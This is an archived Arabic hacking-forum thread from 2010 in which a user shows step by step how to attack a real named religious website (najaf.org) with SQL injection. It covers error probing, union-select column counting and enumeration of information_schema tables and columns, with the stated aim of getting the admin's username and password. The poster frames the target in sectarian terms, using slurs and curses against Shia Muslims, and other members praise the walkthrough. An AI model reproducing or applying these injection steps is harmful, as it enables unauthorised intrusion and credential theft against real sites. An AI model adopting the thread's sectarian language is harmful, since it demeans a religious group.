:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   !! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !! (http://www.vbspiders.com/vb/showthread.php?t=35776)

DR.THMoORY 08-27-2010 11:58 PM
!! إستهداف موقع ارتباط الروافض الشيعه بالسستاني !!
 
[align=center]السلام عليكم ورحمة الله وبركاته

إستهداف موقع ارتباط الروافض بالسستاني لعنهم الله
الموقع المستهدف
www.najaf.org

نوع الثغره
sql injection

لكي نتاكد انو الموقع يحتوي عل خطئ في قاعدة البيانات

نقوم بعمل خطأ في قاعدة البيانات

http://www.najaf.org/mail/us_index.php?l=1'

هع لدينا خطأ في القاعده

في الرقم الأول جيت اضفت

كود PHP:
http://www.najaf.org/mail/us_index.p...,2,3,4,5,6,7/*
بعد ان قمن باضافة الارقام اختفى الخطى وظهر الرقم 2

الآن نضيف هذا الاستثمار

كود PHP:
http://www.najaf.org/mail/us_index.p...chema.tables/*


اسماء الجداول في قاعدة بيانات الموقع

البحث في الجداول للحصول على يوزر و باس الادمن
وممكن نتوسع في الاستغلال والبركه في القراصنه

الان التنقل بين الاعمدة

كود PHP:
http://www.najaf.org/mail/us_index.p...chema.tables/*
العمود الموجود في التابل باسم
columns

جآري التلاعب والتنقل بهذا الاستثمار

كود PHP:
http://www.najaf.org/mail/us_index.p...hema.COLUMNs/*
الان الاستثمار والتنقل إلى العمود COLLATION

وهذا العمود مطلوب

كود PHP:
http://www.najaf.org/mail/us_index.p...a.COLLATIONs/*
[/align]
:a12:

Master vbspiders 08-28-2010 02:41 AM
[align=center]بارك الله فيك على الشرح
لا تحرمنا من جديدك
تحياتي[/align]

mauo 08-28-2010 03:15 AM
موفق
والى الامام دائما


الساعة الآن 01:22 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0